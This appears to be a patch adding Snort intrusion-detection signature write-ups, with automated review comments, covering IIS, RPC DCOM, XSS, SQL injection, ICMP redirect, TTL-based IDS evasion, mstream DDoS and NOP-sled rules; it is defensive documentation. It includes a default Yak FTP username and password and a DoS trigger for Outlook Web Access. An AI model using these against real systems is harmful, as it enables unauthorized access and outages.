+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a web server or an application running ona web server. Some
+applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
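Review bot: Affected Systems is empty; state at least the class of system (1152.txt uses "All systems using a web server."), since a blank section cannot be told apart from an omission. Typo: "running ona web server". As with the other generic web-authentication files, the Summary does not say which authentication mechanism or request pattern the rule matches.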
--- /dev/null
+++ b/doc/signatures/1009.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1009
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
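Review bot: "Sid: 1009" puts the value on the heading line, unlike every other file, where "Sid:" is followed by the number on the next line; a parser keyed on the common layout will miss this one, so split it. The Impact line "Information gathering possible administrator access." needs punctuation ("Information gathering; possible administrator access."). The Detailed Information speaks only of "potential weaknesses" in IIS and the Attack Scenarios of "a sensitive file", without naming the file or path the rule matches; add it so the Corrective Action ("deny access to sensitive files") can be acted on.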
--- /dev/null
+++ b/doc/signatures/3279.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3279
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
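Review bot: this is the fourth verbatim copy of the 3242.txt body (with 3212.txt and 3321.txt), so nothing states which port or transport sid 3279 covers; add that to the Detailed Information. The Attack Scenarios sentence about a file "with an overly long filename via a network share" is not connected to the malformed RPC request described above it, "Expoit" is a typo, and Additional References is empty.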
--- /dev/null
+++ b/doc/signatures/2326.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2326
+
+--
+Summary:
+This event is generated when a cross-site scripting attack is being 
+attempted against the SGDynamo web application.
+
+--
+Impact:
+Successful cross-site scripting attacks generally target the users of 
+a web site. Attackers can potentially gain access to a users' cookies 
+or session identification credentials, allowing the attacker to
+impersonate the user.
+
+--
+Detailed Information:
+The SGDynamo web application does not correctly filter script code in
+URL supplied parameters. It is possible for an attacker to place code of
+their choosing in a link supplied to the application. The code is then
+executed in the browser of a user who clicks on the link.
+
+The error occurs in checking the parameters supplied via the HTNAME
+parameter in the application.
+
+--
+Affected Systems:
+Many older versions of web server software are affected, as are numerous
+web applications.
+
+--
+Attack Scenarios:
+The most common avenue of attack is for the attacker to send an HTML 
+formatted email to the victim. The email will contain a link to a 
+specially crafted URL which contains the exploit. When the victim clicks
+on the link, they are directed to the vulnerable web site and the attack
+code is executed by their browser.
+
+--
+Affected Systems:
+	Ecometry SGDynamo 5.32 U
+	Ecometry SGDynamo 5.32 T
+	Ecometry SGDynamo 6.1
+	Ecometry SGDynamo 7.0
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
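Review bot: this file has two "Affected Systems:" sections, and the first one is wrong. The first says "Many older versions of web server software are affected, as are numerous web applications", which is generic boilerplate that contradicts the second section listing the specific Ecometry SGDynamo 5.32 U / 5.32 T / 6.1 / 7.0 versions; delete the first section so the file follows the same single-section layout as the other signature documents. Also trim the trailing space on the "-- " separator before Additional References, add the missing period after "Upgrade to the latest non-affected version of the software", and state in Detailed Information that the rule keys on the HTNAME parameter, since that is what an analyst will see in the triggering request.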
--- /dev/null
+++ b/doc/signatures/472.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+
+Sid:
+472
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Redirect for Host datagram.
+
+--
+
+Impact:
+Redirect messages are normally an indication that a shorter route to a particular destination exists.  
+
+--
+
+Detailed Information:
+ICMP Redirect messages are generated by gateway devices when a shorter route to the destination exists.  When a gateway device receives an Internet datagram from a host on the same network a check is performed to determine the address of the next hop (gateway) in the route to the datagrams destination.  The datagram is then forward to the next hop on the route.  If this gateway device is also on the same network, the gateway device generates an ICMP Redirect message and sends it back to the host that originally generated the traffic.  The ICMP redirect message informs the original host that a shorter route exists and any additional traffic should be forwarded directly to the closer gateway device.
+
+--
+
+Attack Scenarios:
+Attackers on the local subnet could potentially use ICMP Redirect messages to force hosts to use compromised gateway devices.  
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+ICMP Redirect datagrams are legitimate Internet traffic if a shorter route to a destination actually exists.  
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Ingress filtering should be utilized to block incoming ICMP Type 5 datagrams
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+RFC792
+
+
+--
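Review bot: the Impact section does not state an impact. "Redirect messages are normally an indication that a shorter route to a particular destination exists" describes the protocol; the actual consequence is in Attack Scenarios ("force hosts to use compromised gateway devices"), i.e. traffic from the affected host can be routed through an attacker-controlled gateway and inspected or altered, so move that statement into Impact. Corrective Action is also inconsistent with Attack Scenarios: ingress filtering of ICMP Type 5 at the border only stops external sources, while the scenario places the attacker on the local subnet, so add that hosts should be configured to ignore ICMP redirects (most operating systems expose a setting for this) and that redirects should be logged. Minor fixes: "The datagram is then forward to the next hop" should read "forwarded", "datagrams destination" needs the apostrophe, False Negatives is missing the blank line before its "--" separator, and the reference should be written "RFC 792" with a URL like the other files' references.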
--- /dev/null
+++ b/doc/signatures/595.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+595
+
+--
+Summary:
+Embedded Support Partner (ESP) is an integral part of the SGI IRIX 
+operating system to enable remote support for the operating system
+
+A vulnerability exists in the Embedded Support Partner Daemon (ESP) that
+could lead to arbitrary commands being executed on a target host.
+
+--
+Impact:
+Remote super user access leading to a compromise of the target machine 
+along with any network resources that machine is connected to.
+
+--
+Detailed Information:
+The ESP daemon is an RPC (Remote Procedure Call) resource used on SGI 
+IRIX systems. The ESP daemon runs with the privileges of the root user. 
+IRIX version 6.5.8 and prior are susceptible to a buffer overflow of the
+ESP daemon leading to a remote root compromise of the affected host.
+
+--
+Affected Systems:
+SGI IRIX 6.5.8 and earlier.
+
+--
+Attack Scenarios:
+The attacker would need to craft a packet that would lead to the buffer
+overflow. No current exploits are available.
+
+--
+Ease of Attack:
+Difficult
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+All systems running vulnerable versions of rpc.espd should have the appropriate patch applied. 
+
+Additionally, the ESP daemon should be disabled where not needed by 
+commenting out the appropriate line in inetd.conf. The daemon itself can
+be made non-executable by removal of the x bit (chmod -x rpc.espd).
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0331
+
+Bugtraq:
+http://www.securityfocus.com/bid/2714
+
+--
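Review bot: the last paragraph of Corrective Action is a comma splice: "RPC services should not be available outside the local area network, filter RPC ports at the firewall to ensure access is denied to RPC enabled machines." should be two sentences. The first paragraph of Summary is missing its terminal period after "to enable remote support for the operating system". Additional References cites the candidate identifier CAN-2001-0331; the CAN- prefix was retired when all candidates were renamed to CVE-, so the reference should read CVE-2001-0331 (the cvename.cgi lookup resolves the same number under the CVE- prefix). The Detailed Information and Corrective Action sections are otherwise consistent and give the analyst concrete host-side checks (inetd.conf entry, rpc.espd executable bit), which is good.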
--- /dev/null
+++ b/doc/signatures/1401.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1401
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
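Review bot: neither Summary nor Detailed Information says what the rule actually matches, so an analyst cannot triage the alert from this file. Attack Scenarios mentions retrieving "a sensitive file containing information on the IIS implementation"; name that resource (the path or file the rule's content match looks for) in Detailed Information. Impact reads "Information gathering possible administrator access." and needs punctuation ("Information gathering. Possible administrator access."). In Detailed Information, "gain information on the IIS implementation on the host, this may be the prelude" is a comma splice. "Sid: 1401" is written on one line, unlike the two-line "Sid:" / number layout used by the other files in this patch; keep the layout uniform if anything parses these files. Additional References is empty.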
--- /dev/null
+++ b/doc/signatures/100000807.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000807
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "CommonSense" application running on a webserver. Access to the file "search.php" with SQL commands being passed as the "q" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "q" parameter in the "search.php" script used by the "CommonSense" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using CommonSense
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
--- /dev/null
+++ b/doc/signatures/3260.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3260
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
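Review bot: the body of this file is word-for-word identical to the earlier RPC DCOM document in this patch, so it inherits the same defects and adds nothing that tells the analyst what distinguishes sid 3260. Detailed Information should say which RPC DCOM condition this particular rule matches. As in the earlier file, Attack Scenarios ("a request for a file with an overly long filename via a network share") describes an SMB scenario that contradicts the "malformed request to an RPC port" in Detailed Information; replace it. Fix "Expoit" in Ease of Attack, and populate Additional References with the vendor bulletin and CVE entry for the RPC DCOM vulnerability.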
--- /dev/null
+++ b/doc/signatures/3088.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+3088
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a client buffer
+overflow associated with Winamp's processing of a filename with an
+extension of .cda.
+
+--
+Impact:
+A successful attack may permit a buffer overflow that allows the execution
+of arbitrary code at the privilege level of the user running Winamp.
+
+--
+Detailed Information:
+Winamp is a media file player for Windows developed by Nullsoft.  A buffer
+overflow exists because of insufficient bounds checking while handling the
+name of a CD audio format file (.cda extension) or a playlist that contains
+a filename with a .cda extension.  An overly long name may cause the buffer
+overflow permitting the execution of arbitrary code at the privilege level
+of the user running Winamp.
+
+--
+Affected Systems:
+	Winamp 3.x, and 5.x
+
+--
+Attack Scenarios:
+An attacker can create and send a malformed .cda filename that may cause
+a buffer overflow and the subsequent execution of arbitrary code on the
+vulnerable host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+--
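Review bot: the final section heading is "Additional References" without the trailing colon that every other heading in these files carries; anything that splits the files on "Heading:" will miss it. Affected Systems has a stray comma in "Winamp 3.x, and 5.x". Since Attack Scenarios says the trigger is a malformed .cda filename or a playlist containing one, Corrective Action should add the operational guidance that users should not open playlists or media files from untrusted sources until the upgrade is applied. Additional References is empty for a named product vulnerability.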
--- /dev/null
+++ b/doc/signatures/243.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+243
+
+--
+Summary:
+This event is generated when the mstream DDoS tool is used.
+
+--
+Impact:
+Severe. This indicates a host may have been compromised and mstream may have been installed.  
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack.
+
+There are "handler" hosts that are used to coordinate the attacks and "agent" hosts that launch the attack. An agent will attempt to contact its known handlers using a UDP packet to destination port 6838 with a string of "newserver" in the payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+After a host becomes a mstream agent, it will attempt to communicate with its known handlers.
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+There may be ports other than 6838 used for agent-to-handler communications.
+
+--
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+NAI:
+http://vil.nai.com/vil/content/v_98662.htm
+SecurityFocus:
+http://www.securityfocus.com/archive/82/58040
+CERT:
+http://www.cert.org/incident_notes/IN-2000-05.html
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+--
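Review bot: "The mstream DDoS uses a tiered structure" is missing the noun ("The mstream DDoS tool uses..."), and "a mstream agent" should be "an mstream agent". False Negatives correctly warns that ports other than 6838 may be used; it would help the analyst to add that the "newserver" payload string named in Detailed Information is the more durable indicator, so the rule's port constraint is the weak part of the match. The reference list is inconsistently spaced: the NAI, SecurityFocus and CERT entries run together without blank lines while the CVE entry is set apart; use one layout.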
--- /dev/null
+++ b/doc/signatures/111-15.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+111-15
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. Possible attempt to evade an IDS.
+
+--
+Detailed Information:
+This event is generated whent the pre-processor stream4 detects abnormal
+Time To Live (TTL) values in a datastream. This may indicate an attempt
+to evade an IDS.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker can set the TTL values of all packets to a value so small
+that only the IDS will see the packet and it will not get to the target
+system.
+
+-- 
+Ease of Attack: 
+Simple. Tools such as fragroute enable an attacker to do this.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Insertion, Evasion, and Denial of Service: Eluding Network Intrusion
+Detection:
+http://www.insecure.org/stf/secnet_ids/secnet_ids.html
+
+--
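Review bot: Corrective Action does not address what the rule detects. Attack Scenarios says the low-TTL packets are seen by the IDS but never reach the target, so "Check the target host for signs of compromise" and "apply vendor supplied patches" are beside the point; the relevant actions are on the sensor side: verify where the sensor sits relative to the protected hosts and review the stream4 preprocessor's TTL-evasion settings so that the expected TTL range is correct for the deployment. Also fix "whent" in Detailed Information, remove the stray blank line between the "--" separator and "Corrective Action:", and strip the trailing spaces on the "-- " separators so they match the others.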
--- /dev/null
+++ b/doc/signatures/361.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+361
+
+--
+Summary:
+This event is generated when a remote user executes the SITE EXEC command in a session with an internal FTP server. This may indicate an attempt to exploit a vulnerability in the SITE EXEC command in wu-ftpd version 2.4.1.
+
+--
+Impact:
+Arbitrary code execution, leading to remote root compromise. The attacker must have a valid, non-anonymous FTP account on the server to attempt this exploit. 
+
+--
+Detailed Information:
+A misconfiguration in the pathnames.h configuration file in wu-ftpd 2.4.1 allows users to execute commands from /bin instead of ~username/bin. An attacker with a valid FTP account on the server can exploit this vulnerability to execute arbitrary shell code using the SITE EXEC command.
+
+--
+Affected Systems:
+Servers running Washington University wu-ftpd version 2.4.1 or earlier.
+
+--
+Attack Scenarios:
+An attacker logs into the system using a valid FTP account, and then executes arbitrary shell code to obtain root access to the server.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+If a legitimate remote user uses the SITE EXEC command, this rule may generate an event.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to a later version of the wu-ftp daemon.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0080
+
+CERT
+http://www.cert.org/advisories/CA-1995-16.html
+
+--
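Review bot: Summary and Detailed Information scope the vulnerability to "wu-ftpd version 2.4.1" while Affected Systems says "version 2.4.1 or earlier"; pick one. Corrective Action says "wu-ftp daemon" where the rest of the file uses "wu-ftpd". Because False Positives notes that any legitimate SITE EXEC use fires this rule, Corrective Action should add that disabling SITE EXEC where it is not needed removes both the exposure and the false positives. The reference labels "CVE" and "CERT" lack the trailing colon used in the other files.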
--- /dev/null
+++ b/doc/signatures/2334.txt
@@ -0,0 +1,56 @@
+Rule:  
+
+--
+Sid:
+2334
+
+--
+Summary:
+This event is generated when an attempt is made to access a Yak! FTP
+server using the default username and password.
+
+--
+Impact:
+Administrative access to the server.
+
+--
+Detailed Information:
+Yak FTP servers have a default username and password of "user" and 
+"y049575046", if this is not changed by the administrator it is possible 
+for an attacker to gain unauthorised access to the server.
+
+--
+Affected Systems:
+	Yak FTP servers
+
+--
+Attack Scenarios:
+An attacker merely needs to login to the server using the default 
+username and password.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Change the username and password.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
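Review bot: the product is named "Yak! FTP" in Summary and "Yak FTP" in Detailed Information and Affected Systems; use one spelling. Detailed Information is a comma splice: '..."y049575046", if this is not changed by the administrator it is possible...' should be split after the closing quote. "unauthorised" is the only British spelling in the patch; the sibling files use "unauthorized". Corrective Action could usefully add that once the default credentials are changed, any further hit on this rule is a login attempt with known-default credentials and should be treated as probing. The "Rule:" line carries trailing spaces, and Additional References is empty.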
--- /dev/null
+++ b/doc/signatures/1709.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1709
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
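Review bot: Summary and Detailed Information are entirely generic; no application, script or parameter is named, unlike the sibling documents (100000807.txt names "search.php" and "q"). An analyst reading this file learns nothing about what sid 1709 matches, so add the script name and the request pattern the rule looks for. Fix "ona" and "attackers choosing" (attacker's). The line "relationships between the victim server and other hosts can be exploited by the attacker." overruns the wrap width of the paragraph around it.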
--- /dev/null
+++ b/doc/signatures/1390.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+Sid:
+1390
+
+--
+Summary:
+This event is generated when an attempt is made to execute shellcode on 
+a host in the protected network from a source external to that network.
+
+--
+Impact:
+This set of instructions can be used as a NOOP to pad buffers on an x86 
+architecture machines.
+
+--
+Detailed Information:
+This is the x86 opcode for 'inc ebx'.  This can be used as a NOOP in an 
+x86 architecture, however as with all shellcode rules, this can cause 
+false positives.  Check to see if you are ignoring shellcode rules on 
+web ports, as this will reduce false positives.
+
+--
+Attack Scenarios:
+An attacker can pad buffers with this opcode, in an attempt to overflow 
+the buffer.
+
+--
+Ease of Attack:
+This is a generic rule designed to pick up this opcode in use.
+
+--
+False Positives:
+This will false positive if rule is not ignoring clear text ports every 
+time snort sees 24 'C' characters (hex code of 43) in a row.
+
+This is the x86 opcode for 'inc ebx'.  This can be used as a NOOP in an 
+x86 architecture, however as with all shellcode rules, this can cause 
+false positives.
+
+--
+False Negatives:
+none known
+
+--
+Corrective Action:
+none known
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Mike Poor <mike.poor@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+CansecWest:
+http://cansecwest.com/noplist-v1-1.txt
+
+--
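Review bot: the False Positives section repeats the Detailed Information paragraph verbatim ("This is the x86 opcode for 'inc ebx'. This can be used as a NOOP..."); delete the repeat. Its first sentence is garbled ("This will false positive if rule is not ignoring clear text ports every time snort sees 24 'C' characters (hex code of 43) in a row") and should say that the rule fires whenever 24 consecutive 'C' bytes (0x43) appear in a stream, so clear-text protocols on ports that are not excluded will trigger it. Impact describes the padding technique rather than the impact; state it as a possible buffer-overflow attempt with arbitrary code execution if it succeeds, and fix "an x86 architecture machines". Corrective Action "none known" is not acceptable guidance for a shellcode alert: as the sibling files do, direct the analyst to check the destination host for signs of compromise and to confirm the target service is patched. The file also lacks the Affected Systems section present everywhere else, and "none known" should be capitalised consistently.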
--- /dev/null
+++ b/doc/signatures/970.txt
@@ -0,0 +1,56 @@
+Rule:
+
+--
+Sid:
+1283
+
+--
+Summary:
+This event is generated when an attempt is made to cause a denial of service of WWW Publishing Service and IIS Administration software.
+
+--
+Impact:
+Denial of service.  This attack may cause a vulnerable server to stop.
+
+--
+Detailed Information:
+Outlook Web Access (OWA) is an optional feature of Microsoft Exchange Server that allows a user to access mail through a web interface supported by Internet Information Services (IIS).  A denial of service of the support software WWW Publishing service and IIS Administration can occur when a user enters a long string of '%' characters in the Log On field in OWA and enters these characcters in the username and password field received in the NT challenge dialog.
+
+--
+Affected Systems:
+Microsoft Exchange Server 5.5 and Microsoft Exchange Server 5.5 SP1, SP2, SP3, SP4
+
+--
+Attack Scenarios:
+An attacker can enter a long string of '%' characters in OWA Log On and challenge fields to cause a denial of service against a vulnerable server.
+
+--
+Ease of Attack:
+Simple.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the most current version of Microsoft Exchange Server.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
